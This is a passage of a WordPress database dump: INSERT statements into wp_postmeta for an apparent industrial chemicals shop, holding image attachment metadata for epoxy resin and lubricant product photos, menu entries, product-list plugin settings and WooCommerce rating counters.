INSERT INTO `wp_postmeta` VALUES (15098, 1464, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:33:"2016/09/hexion-epon-resin-828.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:33:"hexion-epon-resin-828-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:33:"hexion-epon-resin-828-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:33:"hexion-epon-resin-828-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:35:"hexion-epon-resin-828-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:33:"hexion-epon-resin-828-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:33:"hexion-epon-resin-828-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:33:"hexion-epon-resin-828-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:33:"hexion-epon-resin-828-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (15099, 1465, '_wp_attached_file', '2016/09/hexion-epon-resin-862.jpg'); 
INSERT INTO `wp_postmeta` VALUES (15100, 1465, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:33:"2016/09/hexion-epon-resin-862.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:33:"hexion-epon-resin-862-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:33:"hexion-epon-resin-862-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:33:"hexion-epon-resin-862-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:35:"hexion-epon-resin-862-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:33:"hexion-epon-resin-862-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:33:"hexion-epon-resin-862-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:33:"hexion-epon-resin-862-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:33:"hexion-epon-resin-862-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (15101, 1466, '_wp_attached_file', '2016/09/hexion-epon-resin-8021.jpg'); 
INSERT INTO `wp_postmeta` VALUES (15102, 1466, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:34:"2016/09/hexion-epon-resin-8021.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"hexion-epon-resin-8021-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"hexion-epon-resin-8021-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"hexion-epon-resin-8021-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:36:"hexion-epon-resin-8021-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"hexion-epon-resin-8021-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"hexion-epon-resin-8021-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"hexion-epon-resin-8021-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"hexion-epon-resin-8021-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (15103, 1467, '_wp_attached_file', '2016/09/hexion-heloxy-modifier-67.jpg'); 
INSERT INTO `wp_postmeta` VALUES (15104, 1467, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:37:"2016/09/hexion-heloxy-modifier-67.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:37:"hexion-heloxy-modifier-67-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:37:"hexion-heloxy-modifier-67-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:37:"hexion-heloxy-modifier-67-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:39:"hexion-heloxy-modifier-67-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:37:"hexion-heloxy-modifier-67-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:37:"hexion-heloxy-modifier-67-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:37:"hexion-heloxy-modifier-67-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:37:"hexion-heloxy-modifier-67-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (15105, 1468, '_wp_attached_file', '2016/09/releasys-8200-semi-permanent-mold-release.jpg'); 
INSERT INTO `wp_postmeta` VALUES (15106, 1468, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:53:"2016/09/releasys-8200-semi-permanent-mold-release.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:53:"releasys-8200-semi-permanent-mold-release-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:53:"releasys-8200-semi-permanent-mold-release-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:53:"releasys-8200-semi-permanent-mold-release-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:55:"releasys-8200-semi-permanent-mold-release-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:53:"releasys-8200-semi-permanent-mold-release-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:53:"releasys-8200-semi-permanent-mold-release-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:53:"releasys-8200-semi-permanent-mold-release-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:53:"releasys-8200-semi-permanent-mold-release-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (15107, 1469, '_wp_attached_file', '2016/09/teflon-silicone-lubricant-quart.jpg'); 
INSERT INTO `wp_postmeta` VALUES (15108, 1469, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:43:"2016/09/teflon-silicone-lubricant-quart.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:43:"teflon-silicone-lubricant-quart-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:43:"teflon-silicone-lubricant-quart-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:43:"teflon-silicone-lubricant-quart-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:45:"teflon-silicone-lubricant-quart-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:43:"teflon-silicone-lubricant-quart-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:43:"teflon-silicone-lubricant-quart-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:43:"teflon-silicone-lubricant-quart-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:43:"teflon-silicone-lubricant-quart-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (15109, 1097, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (15110, 1102, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (15111, 1471, '_wp_attached_file', '2016/08/teflon-severe-service-grease-2.jpg'); 
INSERT INTO `wp_postmeta` VALUES (15112, 1471, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:42:"2016/08/teflon-severe-service-grease-2.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:42:"teflon-severe-service-grease-2-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:42:"teflon-severe-service-grease-2-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:42:"teflon-severe-service-grease-2-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:44:"teflon-severe-service-grease-2-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:42:"teflon-severe-service-grease-2-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:42:"teflon-severe-service-grease-2-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:42:"teflon-severe-service-grease-2-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:42:"teflon-severe-service-grease-2-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"6";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (15113, 1104, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (15114, 1473, '_wp_attached_file', '2016/08/VazoR-General-Information-PUSH-1.pdf'); 
INSERT INTO `wp_postmeta` VALUES (15115, 568, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (15116, 427, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (15117, 575, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (15118, 577, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (15119, 290, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (15120, 310, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (15121, 297, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (15122, 400, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (15123, 293, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (15124, 425, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (15125, 423, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (15149, 1276, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (15152, 1480, '_edit_lock', '1473535670:1'); 
INSERT INTO `wp_postmeta` VALUES (15153, 1480, '_edit_last', '1'); 
INSERT INTO `wp_postmeta` VALUES (15154, 1480, '_wp_page_template', 'page-left-sidebar.php'); 
INSERT INTO `wp_postmeta` VALUES (15155, 1481, '_menu_item_type', 'post_type'); 
INSERT INTO `wp_postmeta` VALUES (15156, 1481, '_menu_item_menu_item_parent', '0'); 
INSERT INTO `wp_postmeta` VALUES (15157, 1481, '_menu_item_object_id', '1480'); 
INSERT INTO `wp_postmeta` VALUES (15158, 1481, '_menu_item_object', 'page'); 
INSERT INTO `wp_postmeta` VALUES (15159, 1481, '_menu_item_target', ''); 
INSERT INTO `wp_postmeta` VALUES (15160, 1481, '_menu_item_classes', 'a:1:{i:0;s:0:"";}'); 
INSERT INTO `wp_postmeta` VALUES (15161, 1481, '_menu_item_xfn', ''); 
INSERT INTO `wp_postmeta` VALUES (15162, 1481, '_menu_item_url', ''); 
INSERT INTO `wp_postmeta` VALUES (15172, 1487, '_edit_lock', '1473716081:1'); 
INSERT INTO `wp_postmeta` VALUES (15173, 1487, '_edit_last', '1'); 
INSERT INTO `wp_postmeta` VALUES (15174, 1487, 'dp_sort-element', 'displayProduct-button,displayProduct-image,displayProduct-title,displayProduct-excerpt'); 
INSERT INTO `wp_postmeta` VALUES (15175, 1487, 'dp_select_template', 'list'); 
INSERT INTO `wp_postmeta` VALUES (15176, 1487, 'dp_title', 's:280:"a:10:{s:11:"column_name";s:0:"";s:12:"column_width";s:0:"";s:4:"type";s:4:"link";s:10:"custom_url";s:0:"";s:9:"font-size";s:2:"14";s:11:"font-family";s:5:"arial";s:6:"weight";s:6:"normal";s:5:"color";s:7:"#444444";s:12:"hover-weight";s:6:"normal";s:10:"HoverColor";s:7:"#A88F5C";}";'); 
INSERT INTO `wp_postmeta` VALUES (15177, 1487, 'dp_image', 's:204:"a:8:{s:11:"column_name";s:0:"";s:12:"column_width";s:0:"";s:4:"type";s:4:"link";s:10:"custom_url";s:0:"";s:12:"hover_effect";s:7:"disable";s:5:"width";s:3:"200";s:6:"height";s:3:"200";s:4:"crop";s:1:"1";}";'); 
INSERT INTO `wp_postmeta` VALUES (15178, 1487, 'dp_excerpt', 's:300:"a:11:{s:11:"column_name";s:0:"";s:12:"column_width";s:0:"";s:6:"lenght";s:0:"";s:4:"type";s:4:"link";s:10:"custom_url";s:0:"";s:9:"font-size";s:2:"14";s:11:"font-family";s:5:"arial";s:6:"weight";s:6:"normal";s:5:"color";s:7:"#444444";s:12:"hover-weight";s:6:"normal";s:10:"HoverColor";s:7:"#A88F5C";}";'); 
INSERT INTO `wp_postmeta` VALUES (15179, 1487, 'dp_content', 's:267:"a:10:{s:11:"column_name";s:0:"";s:12:"column_width";s:0:"";s:6:"lenght";s:0:"";s:4:"type";s:4:"link";s:10:"custom_url";s:0:"";s:9:"font-size";s:2:"14";s:11:"font-family";s:5:"arial";s:6:"weight";s:6:"normal";s:5:"color";s:7:"#444444";s:10:"HoverColor";s:7:"#A88F5C";}";'); 
INSERT INTO `wp_postmeta` VALUES (15180, 1487, 'dp_price', 's:288:"a:10:{s:11:"column_name";s:0:"";s:12:"column_width";s:0:"";s:4:"type";s:11:"custom-link";s:10:"custom_url";s:0:"";s:9:"font-size";s:2:"14";s:11:"font-family";s:5:"arial";s:6:"weight";s:6:"normal";s:5:"color";s:7:"#444444";s:12:"hover-weight";s:6:"normal";s:10:"HoverColor";s:7:"#A88F5C";}";'); 
INSERT INTO `wp_postmeta` VALUES (15181, 1487, 'dp_saleprice', 's:2:"N;";'); 
INSERT INTO `wp_postmeta` VALUES (15182, 1487, 'dp_sku', 's:280:"a:10:{s:11:"column_name";s:0:"";s:12:"column_width";s:0:"";s:4:"type";s:4:"link";s:10:"custom_url";s:0:"";s:9:"font-size";s:2:"14";s:11:"font-family";s:5:"arial";s:6:"weight";s:6:"normal";s:5:"color";s:7:"#444444";s:12:"hover-weight";s:6:"normal";s:10:"HoverColor";s:7:"#A88F5C";}";'); 
INSERT INTO `wp_postmeta` VALUES (15183, 1487, 'dp_stock', 's:280:"a:10:{s:11:"column_name";s:0:"";s:12:"column_width";s:0:"";s:4:"type";s:4:"link";s:10:"custom_url";s:0:"";s:9:"font-size";s:2:"14";s:11:"font-family";s:5:"arial";s:6:"weight";s:6:"normal";s:5:"color";s:7:"#444444";s:12:"hover-weight";s:6:"normal";s:10:"HoverColor";s:7:"#A88F5C";}";'); 
INSERT INTO `wp_postmeta` VALUES (15184, 1487, 'dp_category', 's:280:"a:10:{s:11:"column_name";s:0:"";s:12:"column_width";s:0:"";s:4:"type";s:4:"link";s:10:"custom_url";s:0:"";s:9:"font-size";s:2:"14";s:11:"font-family";s:5:"arial";s:6:"weight";s:6:"normal";s:5:"color";s:7:"#444444";s:12:"hover-weight";s:6:"normal";s:10:"HoverColor";s:7:"#A88F5C";}";'); 
INSERT INTO `wp_postmeta` VALUES (15185, 1487, 'dp_addtocartbutton', 's:211:"a:7:{s:11:"column_name";s:0:"";s:12:"column_width";s:0:"";s:4:"type";s:12:"customButton";s:10:"custom_url";s:0:"";s:11:"custom_text";s:11:"DOWNLAD TDS";s:5:"color";s:7:"#fc5b5b";s:10:"hovercolor";s:7:"#444444";}";'); 
INSERT INTO `wp_postmeta` VALUES (15186, 1487, 'dp_customfield', 's:103:"a:4:{s:11:"column_name";s:0:"";s:12:"column_width";s:0:"";s:8:"meta_key";s:0:"";s:4:"type";s:4:"text";}";'); 
INSERT INTO `wp_postmeta` VALUES (15187, 1487, 'dp_variable', 's:2:"N;";'); 
INSERT INTO `wp_postmeta` VALUES (15188, 1487, 'dp_option', 's:546:"a:15:{s:16:"filter_condition";s:13:"filterproduct";s:18:"category_condition";s:14:"customCategory";s:15:"category_select";a:2:{i:0;s:20:"heloxy-flexibilizers";i:1;s:16:"vertrel-solvents";}s:13:"tag_condition";s:6:"allTag";s:23:"shippingClass_condition";s:16:"allShippingClass";s:12:"stock_select";s:3:"all";s:10:"date_range";s:3:"all";s:10:"start_date";s:0:"";s:8:"end_date";s:0:"";s:4:"sort";s:6:"nameaz";s:7:"perpage";s:2:"50";s:6:"column";s:1:"3";s:11:"frontsorter";s:7:"default";s:10:"pagination";s:7:"default";s:9:"quickview";s:7:"default";}";'); 
INSERT INTO `wp_postmeta` VALUES (15193, 347, '_wc_rating_count', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (15194, 347, '_wc_average_rating', '0'); 
INSERT INTO `wp_postmeta` VALUES (15195, 769, '_wc_rating_count', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (15196, 769, '_wc_average_rating', '0'); 
INSERT INTO `wp_postmeta` VALUES (15197, 783, '_wc_rating_count', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (15198, 783, '_wc_average_rating', '0'); 
INSERT INTO `wp_postmeta` VALUES (15199, 784, '_wc_rating_count', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (15200, 784, '_wc_average_rating', '0'); 
INSERT INTO `wp_postmeta` VALUES (15201, 788, '_wc_rating_count', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (15202, 788, '_wc_average_rating', '0'); 
INSERT INTO `wp_postmeta` VALUES (15203, 789, '_wc_rating_count', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (15204, 789, '_wc_average_rating', '0'); 
INSERT INTO `wp_postmeta` VALUES (15205, 790, '_wc_rating_count', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (15206, 790, '_wc_average_rating', '0'); 
INSERT INTO `wp_postmeta` VALUES (15207, 814, '_wc_rating_count', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (15208, 814, '_wc_average_rating', '0'); 
INSERT INTO `wp_postmeta` VALUES (15209, 1287, '_wc_rating_count', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (15210, 1287, '_wc_average_rating', '0'); 
INSERT INTO `wp_postmeta` VALUES (15211, 1344, '_wc_rating_count', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (15212, 1344, '_wc_average_rating', '0'); 
INSERT INTO `wp_postmeta` VALUES (15213, 1278, '_wc_rating_count', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (15214, 1278, '_wc_average_rating', '0'); 
INSERT INTO `wp_postmeta` VALUES (15215, 1276, '_wc_rating_count', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (15216, 1276, '_wc_average_rating', '0'); 
INSERT INTO `wp_postmeta` VALUES (15217, 1268, '_wc_rating_count', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (15218, 1268, '_wc_average_rating', '0'); 
INSERT INTO `wp_postmeta` VALUES (15219, 1263, '_wc_rating_count', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (15220, 1263, '_wc_average_rating', '0'); 
INSERT INTO `wp_postmeta` VALUES (15221, 824, '_wc_rating_count', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (15222, 824, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (15223, 824, '_wc_average_rating', '0'); 
INSERT INTO `wp_postmeta` VALUES (15224, 984, '_wc_rating_count', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (15225, 984, '_wc_average_rating', '0'); 
INSERT INTO `wp_postmeta` VALUES (15226, 956, '_wc_rating_count', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (15227, 956, '_wc_average_rating', '0'); 
INSERT INTO `wp_postmeta` VALUES (15228, 1102, '_wc_rating_count', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (15229, 1102, '_wc_average_rating', '0'); 
INSERT INTO `wp_postmeta` VALUES (15230, 1100, '_wc_rating_count', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (15231, 1100, '_wc_average_rating', '0'); 
INSERT INTO `wp_postmeta` VALUES (15232, 400, '_wc_rating_count', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (15233, 400, '_wc_average_rating', '0'); 
INSERT INTO `wp_postmeta` VALUES (15234, 297, '_wc_rating_count', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (15235, 297, '_wc_average_rating', '0'); 
INSERT INTO `wp_postmeta` VALUES (15236, 441, '_wc_rating_count', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (15237, 441, '_wc_average_rating', '0'); 
INSERT INTO `wp_postmeta` VALUES (15238, 814, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (15239, 568, '_wc_rating_count', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (15240, 568, '_wc_average_rating', '0'); 
INSERT INTO `wp_postmeta` VALUES (15241, 425, '_wc_rating_count', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (15242, 425, '_wc_average_rating', '0'); 
INSERT INTO `wp_postmeta` VALUES (15243, 733, '_wc_rating_count', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (15244, 733, '_wc_average_rating', '0'); 
INSERT INTO `wp_postmeta` VALUES (15245, 1059, '_wc_rating_count', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (15246, 1059, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (15247, 1059, '_wc_average_rating', '0'); 
INSERT INTO `wp_postmeta` VALUES (15248, 306, '_wc_rating_count', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (15249, 306, '_wc_average_rating', '0'); 
